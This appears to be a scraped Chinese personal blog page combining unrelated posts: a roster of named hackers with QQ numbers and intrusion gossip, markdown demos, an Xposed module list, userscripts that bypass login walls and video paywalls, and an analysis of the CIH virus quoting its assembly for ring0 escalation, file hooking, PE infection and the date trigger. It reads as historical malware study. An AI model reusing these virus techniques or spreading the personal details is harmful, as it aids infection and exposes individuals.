剑心 QQ:369458956 微博:http://t.qq.com/nullnull 方小顿。80sec站长。目前就职于百度公司,曾经跟百度公司老板李彦宏一起参加过芒果台的娱乐节目,一曲成名。不久前因为发布nginx的漏洞而又一次成名,是WEB安全,应用安全方面的高手。(蚊虫补充:wooyun.org就是这家伙开的)

陆羽 QQ:170093007 微博:http://t.qq.com/T00ls_Luyu 博客:http://www.5luyu.cn t00ls核心成员,曾经编写过不少注入,旁注方面的辅助入侵工具,例如t00ls内部旁注工具,GETWEBSHELL等等。目前就职于奇虎360公司。

爱无言 QQ:348450419 EST核心成员。对于漏洞挖掘,溢出利用,网络脚本安全方面有着多年经验。在国内著名黑客杂志黑客防线上发表过上百篇的文章。

樱花浪子 QQ:305446947 博客:http://www.hacklu.net/ SQL注入,WEB应用渗透技术还行。在一些黑客杂志上有过一些技术类文章。

h4k_b4n QQ:616222 微博:http://t.qq.com/h4k_b4n BCT核心成员。是WEB安全,脚本,数据库安全方面的高手,曾经发现过很多著名程序的漏洞。

pt007 QQ:7491805 彭涛。就职于国内著名信息安全公司,启明星辰。是ISTO的创始人。对oracle,mysql等数据库已经php等脚本非常精通。有多年的开发维护测试等安全经验。著名的xp/2k/2k3完美克隆用户的程序就是他的杰作。

majun QQ:45539511(补充 这家伙微博 http://t.qq.com/majun1988) 马俊。据说是个很能装的人。不过还是有点技术,另外还传说他是sunwear的徒弟。可能得到的真传0day有不少。那入侵网站就如鱼得水了。

shadow QQ:26727179 博客:http://hi.baidu.com/p3rlish 影子。渗透高手。perl等脚本方面的高手。

xiaomi QQ:5980740 小米。T00ls的创始人之一。人缘还是不错的。

cnbird QQ:441303228 博客:http://blog.csdn.net/cnbird2008 微博:http://t.qq.com/cnbird2008 如果大家经常看国内的黑客杂志肯定对这个不陌生。linux,windows全方面的渗透高手。有一定的入侵经验。

hackest QQ:297521327 博客:http://www.hackest.cn/ 微博:http://t.qq.com/hackest 也是搞入侵渗透的。不久前一直在卖LMHASH,MD5的彩虹表。

惘然 博客:http://www.wangran.net/ 搞渗透的

4ngel 博客:http://www.sablog.net/blog/ sablog的作者。著名的安全天使站长,现在广为流行的几个WEBSHELL都是他写的,有些是从他大代码上改的。对WEBSHELL行业有着不可磨灭的贡献,也是早期很多PHP程序漏洞的发现者。

xhacker QQ:66680800 小叮当。据说当年入侵过绿盟,也是混迹于黑客圈很久的人了。搞渗透不错。

冷漠 QQ:386817 博客:fhodhttp://www.lengmo.net/ 红狼联盟的创始人。目前好像跟着某前辈黑客做事。

fhod QQ:1988415 博客:http://0day.kr/ 目前好像跟着EST的老大打工。在渗透入侵方面也是有一定经验的,曾经写过一些文章。后来还因为黑站被抓。

冰sugar 博客:http://sebug.cn/ 朱巨源。写过入门级的文章。在X档案有过投稿。也写过书《黑客攻防实战入门》。对一般的渗透技术有一定了解。

虫子 QQ:712663200 博客:http://evilh4ck.blog.sohu.com/ 虫总据说是入侵过不少游戏官方网站。看来应该赚了些钱。此人对入侵攻击还是有很多了解的。

amxking 博客:http://amxking.bokee.com QQ:5711277 红狼的核心成员,也是天阳的管理。

七剑 QQ:7259561 博客:http://1v1.name 微博:http://t.qq.com/qijian 搞WEB脚本,数据库,渗透攻击的。

啊D QQ:9269563 网站:http://www.d99net.net/ 入行时间不短了,写过一些比较出名的工具,如早期的啊D网络工具包和后来的啊D注入工具。从这些可以看出对注入,编程是有一定了解的。经验比较丰富,工具虽然有BUG但还算稳定。

雨夜 QQ:9148357 博客:http://hi.baidu.com/kr4t 混迹黑客全也有数年。技术凑合。曾经也开办过黑客网站。

redbin QQ:35475 网站:http://www.vip8.org/ 红滨。校园黑客联盟站长。

  1. https://www.cnblogs.com/milantgh/p/3853932.html 

  2. 本文作者milantgh为《Web安全漏洞原理及实战》作者。网络安全专家,信息安全顾问 


2021-09-08

网站收藏

善用佳软


2021-09-08

本站之初衷

本站之初衷为记录我于电脑之使用,记录成篇,篇成站。

  • 之所以记录,为能用故也
    • 便于查询,于是乎必有搜索,必有云服务
    • 便于整理,于是乎必有标签,目录
      • 目录,硬件,操作系统,应用软件,学术
      • 标签,关键词
    • 便于转移,必可用于多OS,多编程语言,于是乎求简,求常用。

篇之格式,适应墨水屏

  • 发布时间、修改时间、修改记录
  • 标题分级
  • 图文对齐
  • 字,字体、加粗、颜色分深浅
  • 行内引用,段落引用
    1. 代码块,自动缩进,自动关键词变色,色彩方案可调整
    2. URL等路径
    3. 操作流程
  • 超链接
  • 参考文献
  • 适应多尺寸屏幕

方案选择

  • 备选方案,Windows OS+word之doc文件+网盘
    • 难以查询,比如手机、网吧
  • 备选方案,笔记服务如Onenote,有道云笔记。
    • 不可深度定制功能,不可增有用而去多余
    • 一旦更新,只能被动适应,徒增成本
    • 服务存废不由己

是以选定Github Page+Markdown格式。

Emphasis

This is bold text

This is bold text

This is italic text

This is italic text

Strikethrough

Blockquotes

Blockquotes with plain text

Blockquotes Text

Blockquotes with Lists

  • List one
    • List one.one
    • List one.two
  • List two
  • List three

To end the Blockquotes just put an empty line under >

Lists

Unordered

  • Create a list by starting a line with +, -, or *
  • Sub-lists are made by indenting 2 spaces:
    • Marker character change forces new list start:
      • Ac tristique libero volutpat at
      • Facilisis in pretium nisl aliquet
      • Nulla volutpat aliquam velit
  • Very easy!

Ordered

  1. Lorem ipsum dolor sit amet

    This is ordered List one content

  2. Consectetur adipiscing elit
  3. Integer molestie lorem at massa

This is another ordered list

  1. You can use sequential numbers…
  2. …or keep all the numbers as 1.

Start numbering with offset:

  1. foo
  2. bar

Code

Inline code

Indented code

// Some comments
line 1 of code
line 2 of code
line 3 of code

Block code “fences”

Sample text here...This is code block...paste some code here to try

Tables

Option Description
data path to data files to supply the data that will be passed into templates.
engine engine to be used for processing templates. Handlebars is the default.
ext extension to be used for dest files.

Right aligned columns

Option Description
data path to data files to supply the data that will be passed into templates.
engine engine to be used for processing templates. Handlebars is the default.
ext extension to be used for dest files.

markdown syntax

[link text](http://einverne.github.com)

output:

link text

Add “title text” (which shows up under the cursor)

[link with title](http://einverne.github.io/ "title text!")

output:

link with title

Most URLs will automatically be turned into links. To be explicit, just write it like this:

Autoconverted link <https://github.com/einverne>

output:

Autoconverted link https://github.com/einverne

You can also put the [link URL][1] below the current paragraph
like [this][2].

   [1]: http://url
   [2]: http://another.url "A funky title"

Output:

You can also put the link URL below the current paragraph like this.

Here the text “link URL” gets linked to “http://url”, and the lines showing “1: http://url” won’t show anything.

Or you can use a shortcut reference, which links the text “shortcut” to the link named “shortcut” on the next paragraph.

Or you can use a [shortcut][] reference, which links the text
"shortcut" to the link named "[shortcut]" on the next paragraph.

[shortcut]: http://goes/with/the/link/name/text

Output:

Or you can use a shortcut reference, which links the text “shortcut” to the link named “shortcut” on the next paragraph.

Images

To include an image, just put a “!” in front of a text link:

![Minion](https://octodex.github.com/images/minion.png)

output: Minion

The alternate text will show up if the brower can’t load the image. You can also use a title if you want, like this:

![Stormtroopocat](https://octodex.github.com/images/stormtroopocat.jpg "The Stormtroopocat")

output:

Stormtroopocat

Like links, Images also have a footnote style syntax

![Alt text][id]
[id]: https://octodex.github.com/images/dojocat.jpg  "The Dojocat"

output:

Alt text

With a reference later in the document defining the URL location:

emoji

+1 :+1:
smile :smile:
laughing :laughing:
wink :wink:
grin :grin:
cry :cry:
confused :confused:
yum :yum:

You can find the Emoji from this link

Footnotes

Footnote 1 link1.

Footnote 2 link2.

Inline footnote^[Text of inline footnote] definition.

Duplicated footnote reference2.

Abbreviations

This is HTML abbreviation example.

It converts “HTML”, but keep intact partial entries like “xxxHTMLyyy” and so on.

因为本 Jekyll 在 _config.yml 中配置使用 kramdown markdown解释器,所以更多的语法可以参考官方语法页面

公式

使用 MathJax

使用行内模式 $x^2$ 显示为 $x^2$

使用块模式,用 $$ ... 公式内容 ... $$ 来格式:

\[\frac{x1*5+x2*4+x3*3+x4*2+x5}{5}*2\] \[x = {-b \pm \sqrt{b^2-4ac} \over 2a}\]

这里提供在线 LeTex 公式编辑

  1. Footnote can have markup and multiple paragraphs.

    paragraph 2 this is some text。 

  2. Footnote text.  2


2021-09-05

Windows更新后自动重启

Windows更新后最多延迟三天就自动重启,今天吃亏了,系统留的十五分钟来不及保存工作。于是乎使用组策略

组策略

Win+R gpedit.msc 计算机配置 管理模板 系统组件 Windows更新 对于已登录的用户,计划的自动更新安装不执行重新启动 已启用

修改注册表

Win+R regedit

  1. Launch the Registry Editor by hitting Windows + R, entering regedit into the dialog box and hitting Enter.
  2. Navigate to HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows.
  3. Create a new registry key called WindowsUpdate under Windows if one does not already exist. You can create a new registry key by right clicking on the Windows key, selecting New then Key and renaming the folder which appears to WindowsUpdate.
  4. Create a new registry key named AU under WindowsUpdate.
  5. Create a DWORD Value named NoAutoRebootWithLoggedOnUsers in the AU Key. To create a new DWORD value, right click in the right window pane and select New then DWORD Value. Then rename the value as needed.
  6. Set NoAutoRebootWithLoggedOnUsers to 1. You can set the value by double clicking on the DWORD name and entering the appropriate number in the dialog box which appears.
  7. Close the Registry Editor and Reboot.

2021-09-02 jekyll , rankfile

我使用的 Xposed module

什么都不多说,这个神器就如 Chrome 下的 Tampermonkey,有很多神奇的待发现。

官网地址:http://repo.xposed.info/

更新及 change log: http://forum.xda-developers.com/showthread.php?t=3034811

Xposed Framwork

安装之前

查看设备CPU架构

例如:Nexus 6 CPU芯片是 armv7,选择 arm 即可。 Play Store 上有一个 Hardware Info 的 APP,可以查看 CPU 架构。

然后需要确认手机的 SELinux 设置成 Permissive , 可以使用 SELinuxModeChanger 一款修改 SELinux 的应用。不过 N6 默认是 Permissive 的,也就不用修改了。

下载必要内容

准备好apk,和 zip 包,最好也下载好 xposed-uninstaller*.zip ,当刷入 zip 包之后无限启动的时候可以恢复。不过最好的方式还是通过 recovery 整体备份原来的数据 Nandroid backup 。数据是最重要的!!切记。

Android 6.0 的 framework zip 包在 官网 可以下到。 而 APK 在 Xda 论坛可以找到。

刷入

通过 recovery 刷入 flash zip 之后进入系统会很长时间,之后启动 Xposed Installer ,enable module 之后需要 soft reboot 。 切记需要点击 Xposed Installer 中的 reboot ,不能自己手工 reboot ,否则无法识别 module,掉进这个坑,重启无数次无效。

保留 modules

经过反复尝试保留下来的一些modules,

AdBlocker

屏蔽广告,另外一个可选择的屏蔽广告的 module 叫做 MinMinGuard,还没尝试,效果应该也很好。很多 ROM 集成的 Adaway 似乎也不错。

AppOpsXposed

权限管理,一张图解释所有

AppOpsXposed

Xposed Pokemon

模拟地址,但是 XPrivacy 也是可以有相同的功能的。但是最后还是另一个 module 叫做 Xposed Pokemon 好用。

GravityBox MM

可以定制很多部分,包括状态栏,导航栏,感觉最有用的就是可以定制长按 recent 按钮弹出小的 Launcher。然后自定义快速点击 recent 两次切换最近使用应用也是很有用的。还可以给状态栏加上网速监测。

自用上这个功能感觉已经不在需要刷其他ROM来支持一些特殊功能了,完全原生+Xposed 就已经让我很舒服了。

Greenify

休眠后台服务,很好的App。

No Lock Home

原生 Android 的 Smart Lock 只有根据蓝牙,GPS和侦测随身携带,这个 module 增加了可以根据 WIFI,或者 mac 地址或者 LAC CID 来增加信任的地点,感觉这个更加实用。日常实用 WIFI 的地方一般都是自己熟悉的地方,将那些地方的 WIFI AP name 或者 WIFI Mac 地址加入信任列表,这样就不用总在熟悉的地方解锁解锁解锁了。自己熟悉的地方也总不至于丢手机的吧。

WechatForwarder

很强大的转发,原先一直想要的转发功能都能搞定了。

WechatUnrecalled

微信不撤回

XInsta

下载 Instagram 的图片,自从 IFTTT 不让我自动下载图片之后就诞生了这种需求。也正是因为这个需求让我发现并使用了 Xposed,然后又间接的找到了很多好玩的 module ,不过后来又找到了自动下载 ins 照片到 Google Drive 的方法

运动修改器

修改运动记步频率,还挺神奇的。

在导航栏或者状态栏显示音乐波形,太赞了。

不太需要的 module

使用之后感觉不太需要的 module ,但是很强大的 module

XPrivacy

很复杂的但是很强大的权限管理,非常细节,但是对新手不好,使用非常复杂。对权限要求比较高的可以尝试一下。

链接: http://repo.xposed.info/module/biz.bokhorst.xprivacy

Flat Style Bar Indicators

高度自定义状态栏

Flat Style Colored Bars

和之前使用的 tint status bar 效果差不多,根据应用颜色改变状态栏和导航栏的颜色

Flat Style Colored Keyboard

自动改变键盘的颜色,我使用 TouchPal 所以也用不到。

Ifont

修改系统字体

Amplify

查看那些服务,禁用服务,省电

所有的 Xposed Module 都可以在 http://repo.xposed.info/module-overview 这里找到。当然 Xda 也有很多更新内容。


2016-07-15 Android , AndroidDev , Xposed , 整理合集

Jekyll markdown syntax

GitHub 官方默认使用的 markdown 解析器是 kramdown,他的语法和 markdown 定义的内容相差无几,只有一些些扩充,下面是一些常用的 markdown 语法以及在本博客中可能会使用到的语法内容,如果想要了解 kramdown 的语法可以参考官方的 ref

h1 Heading

h2 Heading

h3 Heading

h4 Heading

h5 Heading
h6 Heading

Horizontal Rules




Emphasis

This is bold text

This is bold text

This is italic text

This is italic text

Strikethrough

Blockquotes

Blockquotes with plain text

Blockquotes Text

Blockquotes with Lists

  • List one
    • List one.one
    • List one.two
  • List two
  • List three

To end the Blockquotes just put an empty line under >

Lists

Unordered

  • Create a list by starting a line with +, -, or *
  • Sub-lists are made by indenting 2 spaces:
    • Marker character change forces new list start:
      • Ac tristique libero volutpat at
      • Facilisis in pretium nisl aliquet
      • Nulla volutpat aliquam velit
  • Very easy!

Ordered

  1. Lorem ipsum dolor sit amet

    This is ordered List one content

  2. Consectetur adipiscing elit
  3. Integer molestie lorem at massa

This is another ordered list

  1. You can use sequential numbers…
  2. …or keep all the numbers as 1.

Start numbering with offset:

  1. foo
  2. bar

Code

Inline code

Indented code

// Some comments
line 1 of code
line 2 of code
line 3 of code

Block code “fences”

Sample text here...This is code block...paste some code here to try

Tables

Option Description
data path to data files to supply the data that will be passed into templates.
engine engine to be used for processing templates. Handlebars is the default.
ext extension to be used for dest files.

Right aligned columns

Option Description
data path to data files to supply the data that will be passed into templates.
engine engine to be used for processing templates. Handlebars is the default.
ext extension to be used for dest files.

markdown syntax

[link text](http://einverne.github.com)

output:

link text

Add “title text” (which shows up under the cursor)

[link with title](http://einverne.github.io/ "title text!")

output:

link with title

Most URLs will automatically be turned into links. To be explicit, just write it like this:

Autoconverted link <https://github.com/einverne>

output:

Autoconverted link https://github.com/einverne

You can also put the [link URL][1] below the current paragraph
like [this][2].

   [1]: http://url
   [2]: http://another.url "A funky title"

Output:

You can also put the link URL below the current paragraph like this.

Here the text “link URL” gets linked to “http://url”, and the lines showing “1: http://url” won’t show anything.

Or you can use a shortcut reference, which links the text “shortcut” to the link named “shortcut” on the next paragraph.

Or you can use a [shortcut][] reference, which links the text
"shortcut" to the link named "[shortcut]" on the next paragraph.

[shortcut]: http://goes/with/the/link/name/text

Output:

Or you can use a shortcut reference, which links the text “shortcut” to the link named “shortcut” on the next paragraph.

Images

To include an image, just put a “!” in front of a text link:

![Minion](https://octodex.github.com/images/minion.png)

output: Minion

The alternate text will show up if the brower can’t load the image. You can also use a title if you want, like this:

![Stormtroopocat](https://octodex.github.com/images/stormtroopocat.jpg "The Stormtroopocat")

output:

Stormtroopocat

Like links, Images also have a footnote style syntax

![Alt text][id]
[id]: https://octodex.github.com/images/dojocat.jpg  "The Dojocat"

output:

Alt text

With a reference later in the document defining the URL location:

emoji

+1 :+1:
smile :smile:
laughing :laughing:
wink :wink:
grin :grin:
cry :cry:
confused :confused:
yum :yum:

You can find the Emoji from this link

Footnotes

Footnote 1 link1.

Footnote 2 link2.

Inline footnote^[Text of inline footnote] definition.

Duplicated footnote reference2.

Abbreviations

This is HTML abbreviation example.

It converts “HTML”, but keep intact partial entries like “xxxHTMLyyy” and so on.

因为本 Jekyll 在 _config.yml 中配置使用 kramdown markdown解释器,所以更多的语法可以参考官方语法页面

公式

使用 MathJax

使用行内模式 $x^2$ 显示为 $x^2$

使用块模式,用 $$ ... 公式内容 ... $$ 来格式:

\[\frac{x1*5+x2*4+x3*3+x4*2+x5}{5}*2\] \[x = {-b \pm \sqrt{b^2-4ac} \over 2a}\]

这里提供在线 LeTex 公式编辑

  1. Footnote can have markup and multiple paragraphs.

    paragraph 2 this is some text。 

  2. Footnote text.  2


2015-09-10 intro , beginner , jekyll , tutorial

我使用的Userscript

在使用 [[Userscript]] 之前针对使用的浏览器安装如下的插件

Userscripts

浏览器插件

如果想要在浏览器中快捷方便的管理和安装脚本,可以使用如下的插件:

userscripts 网站汇总

userscripts.org已挂 原因参见:ghacks.net 对于已挂的 userscripts.org 链接,例如

http://userscripts.org/scripts/show/175005

在网址中间添加-mirror即可访问,如下:

http://userscripts-mirror.org/scripts/show/175005

新兴诞生的 Userscripts 网站列表

Greasyfork

GreasyFork 或许是最受欢迎的后起之秀了。它由 Jason Barnabe 创建,Jason Barnabe 同时也是 Stylish 网站的创办者,在其储存库中有大量的脚本资源。

  • 拥有大量的活跃脚本
  • 拥有从 GitHub 同步脚本的功能
  • 非常活跃的开放源码 GitHub

OpenUserJs

OpenUserJS 继 GreasyFork 之后开始创办。它由 Sizzle McTwizzle 创建,同样地,在其储存库中也拥有大量的脚本资源。

GitHub/Gist

可以在 GitHub 或者 gist 中搜索.user.js 后缀的文件。

脚本推荐

Download YouTube videos as MP4

这个脚本最初也是在userscripts.org上面更新的,可能后来网站不维护了,作者就在GitHub更新了。同样在 Greasyfork 也能找到下载链接。

Ingress Intel Total Conversion

简称 IITC ,Ingress 玩家的神器,IITC有一系列的脚本,都能在网站上找到链接,这里推荐我使用的一些桌面版脚本:

  • IITC Plugin draw tools
  • IITC plugin player tracker
  • IITC plugin sync
  • IITC plugin Zaprange
  • IITC plugin show linked portals

如果发现好用的IITC Plugin欢迎交换使用体验。

下载地址:http://iitc.jonatkins.com/?page=desktop

百度网盘助手

获取百度网盘直链

下载地址:Greasyfork

豆瓣电影自定义搜索

调用Google Custom Search Engine的脚本,在豆瓣电影页面显示下载链接

下载地址:Greasyfork

知乎免登录

看名字就能看出来,知乎隐藏完整的答案,只有登录才能查看全部的答案。用这个脚本可以破除这个限制。

下载地址:Greasyfork

verydou

该脚本在豆瓣上显示veryCD内容,我将此脚本转移到greasyfork

下载地址:Greasyfork

vipVideos_skipAd

优酷、土豆VIP免费看,去iqiyi、PPS、sohu、56.com视频广告

下载地址:Greasyfork

最后

好吧,放弃了,脚本好多失效了,等再发现好用的再更新吧,可以经常到上面提到的两个网站上逛一逛,会有惊喜,昨天就发现了优酷土豆爱奇艺等等国内视频网站的去广告脚本。

reference


2015-08-03 userscript , tampermonkey , greasemonkey , script , greasyfork

电子书

最近文章

  • CIH二三事 在母亲的回忆里,中学时的陈盈豪就很喜欢玩电脑,上了高中后更是开始专心研究电脑软件。高一那年,他开始学习 BASIC 和 C 语言,「那时候我一点都不懂,我的电脑启蒙是从电脑游戏开始的」。插卡、拔卡、研究游戏,以为这一辈子要变成游戏的设计者的他从没想过要成为病毒的制造者,报考大学也是为了写出完美的程序——因为「电脑对于我来说就是一切」。 T 恤、短裤、凉鞋,常常一副还没睡醒的样子就来上课,就是大学同学眼中的陈盈豪。不过一提起电脑马上变得不一样,甚至一下课就会跑会宿舍打开电脑,练习编程。 Windows 95 的出现让他转移了注意力,大二时开始研究 Windows 的 Kernel(内核,操作系统的核心部分)。每天打开系统找 Bug,有时为了怕自己忘记已经进行到哪里,常常 24 小时不睡觉一直不停的调试。直到他发现 Windows95 只要通过一行 C 语言程序就可以让系统宕机,这行程序能毁掉中断向量表——这也是 CIH 病毒体积只有 700 个字节,却能毁掉系统的原因之一。1不到1KB就能删除你的BIOS,破坏你的硬盘。2 他一致强调兴趣执着和专注力。在 2013HITCON 现场,主持人问及如何在接触电脑 5 年的时间内就能写出 CIH,陈盈豪的回答是「因为只做一件事」。专注于一件事情,网站、Java 都不写,把所有时间都放在专注研究 Kernel 上。 高一第一次接触电脑病毒时,陈盈豪觉得病毒很恐怖、担心会被传染,大学的课程和对专业知识的钻研造就驱散了这些恐惧。大四时周围的人都说电脑病毒无法毁掉 BIOS(基本输入输出系统,为计算机提供最底层的、最直接的硬件设置和控制),他却认为有工具能升级 BIOS,那么病毒也可以升级它。为了调试程序陈盈豪电脑的 BIOS 当然也烧掉过——屏幕一片漆黑——再烧买来的第二颗新的 BIOS。 不眠不休的一步步调试,再加上喜欢优化程序一个一个字符的减少病毒体积,CIH 病毒最后只有不到 800 个字节。作为实验程序,CIH 被陈盈豪存储在校内供他个人使用的主机上,并加上了「病毒」的警告。他的本意并不是为了造成破坏,CIH 的流行是因为在他不知情的状况下,他的同学使用了实验用电脑而将病毒携出。 不然谁会用自己的名字,去命名一个病毒? 体积小、能自行改变程序码分布、又能隐藏在文件未使用的空白区且不改变文件大小,CIH 由于不易察觉而迅速传播开来。1998 年 4 月 26 日 CIH 第一次爆发就震惊了世界,让 6000 万主机宕机的病毒背后,竟然是一个还在读大学的年轻人。 源码分析2 CIH 1.4 的源码可以在github上找到。作者的编码习惯很好,各部分都也有注释,开头部分是版本记录,将版本变化的具体时间和具体功能都记录了下来。 我们先把时间线理一下。 1.0版的完成时间是1998年4月26日, 完成基本功能,此时病毒的大小是656个字节。 1.1版的完成时间是1998年5月15日, 增加操作系统判断,如果是WinNT,则不运行病毒,此时病毒的大小是796个字节。 1.2版的完成时间是1998年5月21日, 增加删除BIOS和破坏硬盘功能,此时病毒的大小是1003个字节。 1.3版的完成时间是1998年5月24日, 修复感染winzip自解压文件的错误,此时病毒的大小是1010个字节。 1.4版的完成时间是1998年5月31日, 彻底修复感染winzip自解压文件的错误,此时病毒的大小是1019个字节。 1998年7月26日,CIH病毒在美国大面积传播;1998年8月26日,CIH病毒实现了全球蔓延,公安部发出紧急通知,新华社和新闻联播跟进报导; 之后,CIH病毒作者陈盈豪公开道歉并积极提供解毒程式和防毒程式,CIH病毒逐渐得到有效控制。 PE文件头 源码第一部分是文件头: OriginalAppEXE SEGMENT FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h ..... db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS 就是PE文件的MZ文件头。 这段文件头的主要目的是为了符合PE(Portable Execute, 可移植执行文件格式)文件格式.我们常见的EXE,DLL,OCX等文件都必须符合微软规定的PE格式,这样Windows操作系统才能识别并执行,这里我们跳过不做分析,感兴趣的读者可以对照PE文件头和源码自行分析。网络上也有很多关于PE格式分析的文章。 另外,请各位读者注意,因为CIH的故事已经过去很久了,CIH所曾经使用的有些技术已经过时,但却能在今天找到借鉴,有些技术则没有过时,可谓生命力顽强,这一点我会在文章中一一指出,希望能供大家参考借鉴。 VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* 病毒真正开始运行是从VirusGame段开始的。作者完成这个病毒时是23岁,还是少年人的心性。 修改SEH MyVirusStart: push ebp ; ************************************* ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax 程序的第一段是修改Windows的SEH(Structured Exception Handing)。首先,什么是SEH?为什么要修改SEH呢? SEH,Structured Exception Handing, 结构化异常处理,是Windows操作系统的异常和分发处理机制.该机制的实现方式是将FS[0]指向一个链表,该链表告诉操作系统当出现异常的时候应该找谁处理。 类似于我们现实生活中的紧急联系人列表,如果应用程序出了什么问题,就交给链表中的一号紧急联系人处理,如果一号紧急联系人无法处理,就交给二号联系人。依次类推。当所有的异常处理函数都调用完成,而异常仍然没有处理掉,这时,操作系统就会调用默认的异常处理程序,通常是给出错误提示并关闭应用程序。 而修改SEH的原因我们会在稍后介绍。 以上代码通过修改FS[0]使得当前的SEH指向StopToRunVirusCode SEH是Windows提供的异常处理机制,直至今天仍然在各个安全领域应用。 进入内核 odify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 cli mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point lea esi, MyExceptionHook-@1[ecx] push esi mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address pop esi int HookExceptionNumber 接下来这段代码通过修改中断描述符表,获得CPU的ring0权限。 而在WinNT操作系统中,IDT所指向的内存已经无法修改,因此在执行这段代码时,会产生异常。也就是说,这种获取Ring0权限的方法,现在已经没有效果了。 因此,上段代码修改SEH,或者称为编辑SEH的目的就很明了了。 目的就在与识别当前的操作系统,如果发现是WinNT或以后的操作系统,就会自动产生异常并跳到StopToRunVirusCode,停止运行。 当在win9x操作系统时,这段代码通过修改中断描述符表,使异常处理函数指向MyExceptionHook。最后一句 int HookExceptionNumber 则直接触发异常,进入MyExceptionHook。下面我们进入MyExceptionHook进行分析。 MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 jecxz AllocateSystemMemoryPage 这里有一个小技巧。病毒使用dr0寄存器存放病毒的安装状态,dr0寄存器主要用于调试,在应用程序正常运行过程中一般不会修改。因此,将其作为一个全局的临时寄存器。 第一次进入MyExceptionHook时,因为jz的条件并不成立,并不会跳到InstallMyFileSystemApiHook, 而是跳到AllocateSystemMemoryPage进行内存的分配。 此后我们还会第二次回到MyExceptionHook,这时才会调用InstallMyFileSystemApiHook,安装系统钩子。 ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 jmp LoopOfMergeAllVirusCodeSection QuitLoopOfMergeAllVirusCodeSection: pop esi 在调用AllocateSystemMemoryPage分配了系统内存后,接下来这段代码会将病毒代码复制到此前分配的系统内存中。 挂钩系统调用 ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Again 接下来第二次调用int指令进入MyExceptionHook。接着会跳到InstallMyFileSystemApiHook。 InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags mov dr0, eax ; Save OldFileSystemApiHook Address pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax cli jmp ExitRing0Init 顾名思义,以上代码就是把病毒的文件处理函数hook到系统调用中。采用的是一种已经被Windows废弃了的技术,叫做VXD,这种技术只能在win9x系统上才能使用,到了WinNT已经不能使用了。 但实际上原理是一样的,主要的目的是挂钩文件操作函数的系统调用,方法也大同小异,先获取旧的系统调用地址,使用我们的调用函数替换旧的函数,执行完我们的功能后回到旧的地址。 花开两枝,我们各表一支。到这里我们先记住,病毒安装了一个系统调用钩子,当执行文件操作的时候,会运行到我们的钩子函数里面。 这里我们看到,安装完钩子以后,会跳到ExitRing0Init,退出ring0状态。 ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; iretd 退出Ring0之后接着向下走。 ; ************************************* ; * Let's Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti xor ebx, ebx jmp RestoreSE RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ret ; Return to Original App Entry Point 这时,打开中断并恢复之前被病毒修改的SEH,毕竟我们的中断已经关得够久了。 最后,如果是通过其他被感染的程序进来的,就回到之前程序的入口点继续执行,否则,直接ret退出。 接下来,我们分析之前挂钩的函数FileSystemApiHook; 当有文件读写调用时,Windows会调用被病毒替换的FileSystemApiHook。 因为是VXD的驱动程序,程序借鉴意义不大,到这里,我们加快速度,分析的粒度会粗一些。 首先根据系统调用的入参判断是否是打开文件调用。如果是打开文件调用则获取需要打开的文件的路径。 接着,作者用大概100行左右的汇编代码判断一个文件是否是PE文件,如果是PE文件就将病毒代码感染到文件中。 感染的方式将病毒代码写入PE文件,修改PE文件的签名,并修改入口点为病毒代码。 ; *************************** ; * Let's Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ; *************************** ; * Let's Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: ...... jmp WriteVirusCodeToFile 潜伏与发作 同时,当系统调用参数为cloasefile时,进行当前时间判断: CloseFile: xor eax, eax mov ah, 0d7h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? * ; ************************************* popf pop esi jnc IsKillComputer IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? 